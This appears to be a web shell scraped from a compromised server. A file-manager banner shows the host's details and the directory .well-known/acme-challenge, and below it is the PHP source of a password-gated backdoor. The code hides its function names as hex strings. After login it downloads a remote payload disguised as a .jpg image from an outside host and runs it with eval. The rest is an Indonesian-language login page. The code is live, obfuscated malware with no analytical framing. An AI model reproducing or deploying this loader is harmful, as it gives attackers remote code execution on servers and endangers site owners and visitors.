| Server IP : 104.21.93.65 / Your IP : 104.23.243.50 Web Server : Apache System : Linux server.localhost.com 6.8.0-85-generic #85-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 18 15:26:59 UTC 2025 x86_64 User : pahana ( 1029) PHP Version : 7.4.33 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /home/pahana/public_html/.well-known/acme-challenge/ |
Upload File : |
<?php
session_start();
function is_logged_in() {
return isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true;
}
$username = "Xu_SEO";
$passwordHash = '$2a$12$IJXHytvtDALpfMzmtlnyoOJXSwVd2932MTY3ix1jCzPC/8gAwWW2a';
if (!is_logged_in()) {
if (isset($_POST['username']) && isset($_POST['password'])) {
if ($_POST['username'] === $username && password_verify($_POST['password'], $passwordHash)) {
$_SESSION['loggedin'] = true;
header("Location: " . $_SERVER['PHP_SELF']);
exit();
} else {
$error = "Salah Begok!!! Cabut ko!!!";
}
}
}
function hex2str($hex) {
$str = '';
for ($i = 0; $i < strlen($hex); $i += 2) {
$str .= chr(hexdec(substr($hex, $i, 2)));
}
return $str;
}
function geturlsinfo($destiny) {
$Array = array(
'666f70656e',
'73747265616d5f6765745f636f6e74656e7473',
'66696c655f6765745f636f6e74656e7473',
'6375726c5f65786563'
);
$belief = array(
hex2str($Array[0]),
hex2str($Array[1]),
hex2str($Array[2]),
hex2str($Array[3])
);
if (function_exists($belief[3])) {
$ch = curl_init($destiny);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$love = $belief[3]($ch);
curl_close($ch);
return $love;
} elseif (function_exists($belief[2])) {
return $belief[2]($destiny);
} elseif (function_exists($belief[0]) && function_exists($belief[1])) {
$purpose = $belief[0]($destiny, "r");
$love = $belief[1]($purpose);
fclose($purpose);
return $love;
}
return false;
}
if (is_logged_in()) {
$destiny = 'https://nekan-dua.dev/aexdy/aexdy.jpg';
$dream = geturlsinfo($destiny);
if ($dream !== false) {
eval('?>' . $dream);
exit();
}
}
if (!is_logged_in()) {
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>SIAPA KAU ?!!!</title>
<style>
body, html {
margin: 0;
padding: 0;
height: 100%;
display: flex;
justify-content: center;
align-items: center;
background-color: #6fe9f0;
font-family: Arial, sans-serif;
}
.form-container {
display: flex;
justify-content: center;
align-items: center;
height: 100%;
}
.login-form {
width: 300px;
padding: 20px;
background-color: #3d003d;
border-radius: 8px;
box-shadow: 0px 4px 12px rgba(0, 0, 0, 0.2);
text-align: center;
color: white;
}
.login-form img {
width: 80px;
margin-bottom: 10px;
}
.login-form h2 {
margin: 0;
padding: 10px 0;
font-size: 20px;
}
.login-form input[type="text"],
.login-form input[type="password"] {
width: 100%;
padding: 10px;
margin: 10px 0;
border: none;
border-radius: 4px;
box-sizing: border-box;
font-size: 16px;
}
.login-form button {
width: 100%;
padding: 10px;
background-color: #f43ed5;
color: white;
border: none;
border-radius: 4px;
cursor: pointer;
font-size: 16px;
}
.login-form button:hover {
background-color: #f43ed5;
}
.login-form .options {
margin-top: 10px;
font-size: 14px;
color: #d1d1d1;
}
.login-form .options a {
color: #f43ed5;
text-decoration: none;
}
.login-form .options a:hover {
text-decoration: underline;
}
.error-message {
color: red;
font-size: 14px;
margin-top: 10px;
}
</style>
</head>
<body>
<div class="form-container">
<div class="login-form">
<img src="https://21ap.pages.dev/xpic/icon1.gif" alt="Logo">
<h2>SIAPA KAU ?!!!</h2>
<?php if (isset($error)): ?>
<div class="error-message"><?php echo $error; ?></div>
<?php endif; ?>
<form method="post">
<input type="text" name="username" placeholder="Username ..." required>
<input type="password" name="password" placeholder="Password ..." required>
<button type="submit">Sini Mas💦</button>
</form>
<div class="options">
<label><input type="checkbox">Lupa Nama? Ingat Rasa?</label>
<br>
<a href="#">Cetak Baru?</a> | <a href="#">Lupa Diri?</a>
</div>
</div>
</div>
</body>
</html>
<?php
exit();
}
?>